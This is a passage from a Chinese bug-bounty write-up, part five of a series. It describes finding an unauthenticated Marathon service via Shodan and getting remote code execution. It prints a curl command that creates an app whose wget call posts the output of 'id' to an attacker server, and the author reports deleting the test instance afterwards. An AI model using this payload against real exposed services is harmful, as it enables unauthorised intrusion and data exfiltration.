挖洞经验 | 通过Shodan发现目标应用Marathon服务的RCE漏洞( 五 )

curl -sk -X POST -H \"Content-type: application/json\"https://XXX.XXX.XXX.XXX/v2/apps-d '{ \"mem\": 16 \"id\": \"rce-id\" \"cmd\": \"/usr/bin/wget --user-agent=marathon-id --post-data=https://mparticle.uc.cn/api/`id` attacker_server:55555/"'

3、再打开https://XXX.XXX.XXX.XXX/ui/#/apps 的Marathon服务管理界面 , 可以看到其中已经包含了一个名为“rce-id”的实例 , 这就是我们刚刚用curl命令创建的 。 在我的自架服务器中 , 稍等一会 , 就能看到XXX.XXX.XXX.XXX响应回来的cmd命令输出结果:

PS:测试过后 , 为了不对目标应用系统造成安全影响 , 我及时从Marathon界面中删除了创建的“rce-id”实例 。 整个过程中 , 就用到了netcat、curl命令和浏览器 , 另外 , 当然主要还是Shodan很给力了 。

以上全部数据来源互联网 , 如有侵权 , 请及时与我们联系 , 我们将进行删除 , 谢谢

推荐阅读